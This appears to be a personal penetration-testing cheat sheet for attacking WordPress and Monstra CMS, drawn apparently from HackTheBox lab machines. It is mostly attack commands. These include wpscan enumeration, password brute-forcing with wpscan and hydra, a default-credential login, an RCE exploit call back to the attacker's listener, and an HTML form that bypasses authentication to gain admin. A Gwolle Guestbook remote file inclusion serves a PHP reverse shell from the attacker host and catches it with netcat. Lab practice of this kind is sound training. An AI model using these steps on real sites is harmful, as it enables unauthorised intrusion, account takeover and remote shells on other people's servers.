Wordpress
Investigate
https://$IP/webservices/wp
https://$IP/webservices/wp/wp-login.php
/wordpress/ ....suggests we have a very fertile ground for planting an attack. User access = shell.
/phpmyadmin/ ....suggests there is a database ready to plunder.
/info.php .....gives us Kernel, hostname and OS information immediately.wpscan
Wordpress Vuln Scanner
> wpscan --url $IP
> wpscan --url https://$IP --disable-tls-checks
Enum plugins
> wpscan --url http://$IP/webservices/wp/ --enumerate p
> wpscan --url http://$IP/webservices/wp -e ap --log wpscan.out ...ap=all plugs
Enum plugins/themes/users
> wpscan --url http://$IP/webservices/wp -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token GetYourOwnAPIKey 2>&1
Brute with known user: 'elliot'
> wpscan --url 192.168.50.102 -U elliot --passwords ./fsocity_uniq.dic
-----------------------
-----------------------
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/
admin:admin ..default works!
Try to edit themes!
They are often php
Monstra > Extends > Themes
"Helloworld" > Save ..fails
System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails
System > Settings > Maintenance Mode
<?php phpinfo(); ?> ..Save Fails
Hello ..Save Fails
-----------------------
-----------------------
searchsploit monstra
github monstra > Issues >
php code execution
Look for sqli or lfi
-----------------------
-----------------------
Wordpress RCE Exploits
wordpress-rce-exploit.sh
wordpress-rce-exploit.py --python version
> sudo python ./wordpress-rce-exploit.py http://$IP/wp-login.php $MyIP:4444 adminwp curl trick
Tries to catch the 'enter new password link'
> curl -H "Host: $IP" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://$IP/wp-login.php?action=lostpasswordwp-support-plus-responsive-ticket-system
> wpscan --url https://$IP --disable-tls-checks
wp-support-plus-responsive-ticket-system
Version: 7.1.3
> searchsploit -x 41006.txt
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Save as hello.html
Serve: python3 -m http.server
http://localhost/hello.html
Reload page - Now Admin!!
https://brainfuck.htb/?page_id=6
https://brainfuck.htp/wp-admin/admin-ajax.php Brute Force Username - Hydra
> hydra -vV -L users.dic -p wedontcare 192.168.50.102 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'Gwolle Guestbook RFI
TartarsauceHTB
Check your version:
Basically:
http://$IP...ajaxresponse?abspath=http://$MyIP/
Place an evil 'wp-load.php' (actually reverse PHP) on your local web server
-------------------------
searchsploit gwolle
searchsploit -x 38861 ..read
Remote File Inclusion (RFI) - Found for 1.5.3
-------------------------
RFI:
http://$IP/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP
-------------------------
Prep:
locate php-reverse
cp /usr/share/webshells/php/php-reverse-shell.php wp-load.php
vim wp-load.php
python -m SimpleHTTPServer 80
-------------------------
Exploit:
curl -s http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP/
(keep the trailing / or else this wont work)
nc -lvnp 7500
connected!Last updated